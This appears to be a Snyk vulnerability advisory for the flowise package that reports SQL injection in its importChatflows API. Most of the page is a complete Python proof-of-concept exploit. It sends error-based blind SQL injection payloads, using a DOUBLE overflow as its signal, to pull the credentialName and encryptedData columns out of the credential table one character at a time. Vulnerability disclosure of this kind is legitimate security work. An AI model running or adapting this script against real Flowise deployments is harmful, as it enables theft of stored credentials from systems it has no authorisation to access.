Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsA fix was pushed into the master
branch but not yet published.
flowise is a Flowiseai Server
Affected versions of this package are vulnerable to SQL Injection: Hibernate via the importChatflows
process. An attacker can execute arbitrary SQL commands by injecting malicious SQL code into the input parameters.
import argparse
import requests
def import_chatflows(
url: str,
token: str,
payload: dict
):
response = requests.post(
f'{url}/api/v1/chatflows/importchatflows',
headers={
'Authorization': f'Bearer {token}'
# 'Authorization': f'Basic {token}'
},
json=payload
)
return response.json()
def import_normal_data(
api_url: str,
token: str,
normal_data: str
):
data_id = 'aaaaaa'
payload = {
"Chatflows": [
{
"id": data_id,
"name": normal_data,
"flowData": "{}"
}
]
}
import_chatflows(
url=api_url,
token=token,
payload=payload
)
return data_id
def get_character(
api_url: str,
token: str,
data_id: str,
column_name: str,
index: int
):
injection_query = f'(SELECT ascii(substr({column_name},{index},1)) FROM credential limit 0,1)'
def create_payload(
c: int
):
return f"{data_id}') and if (({injection_query})<{c}, 0, 9e300 * 9e300); -- "
chatflows_json = {
"Chatflows": [
{
"id": "",
"name": data_id,
"flowData": "{}"
}
]
}
bitbox = [
64, 32, 16, 8, 4, 2, 1
]
character = 0
for bit in bitbox:
payload = create_payload(c=character + bit)
chatflows_json['Chatflows'][0]['id'] = payload
res = import_chatflows(
url=api_url,
token=token,
payload=chatflows_json
)
if 'DOUBLE value is out of range' in res['message']:
# character is more then bit
character += bit
else:
# character is less then bit
character += 0
return chr(character)
def get_length(
api_url: str,
token: str,
data_id: str,
column_name: str
):
injection_query = f'(SELECT length({column_name}) FROM credential limit 0,1)'
def create_payload(
c: int
):
return f"{data_id}') and if (({injection_query})<{c}, 0, 9e300 * 9e300); -- "
chatflows_json = {
"Chatflows": [
{
"id": "",
"name": data_id,
"flowData": "{}"
}
]
}
column_len = 0
bitbox = [
256, 128, 64, 32, 16, 8, 4, 2, 1
]
for bit in bitbox:
payload = create_payload(c=column_len + bit)
chatflows_json['Chatflows'][0]['id'] = payload
res = import_chatflows(
url=api_url,
token=token,
payload=chatflows_json
)
if 'DOUBLE value is out of range' in res['message']:
# column_len is more then bit
column_len += bit
else:
# column_len is less then bit
column_len += 0
return column_len
def main(
url: str,
token: str
):
api_url = url
column_box = [
'credentialName',
'encryptedData'
]
data_id = import_normal_data(
api_url=api_url,
token=token,
normal_data='flow01'
)
for column_name in column_box:
column_len = get_length(
api_url=api_url,
token=token,
data_id=data_id,
column_name=column_name
)
print(f'[+] {column_name} length is {column_len}')
result = ''
for i in range(column_len):
result += get_character(
api_url=api_url,
token=token,
data_id=data_id,
column_name=column_name,
index=i + 1
)
print(f'[+] {column_name}: {result}')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--url',
type=str,
default='http://flowise:3000'
)
parser.add_argument(
'--access',
type=str,
required=True,
help='Get from http://flowise:3000/apikey'
)
m_args = parser.parse_args()
main(
url=m_args.url,
token=m_args.access
)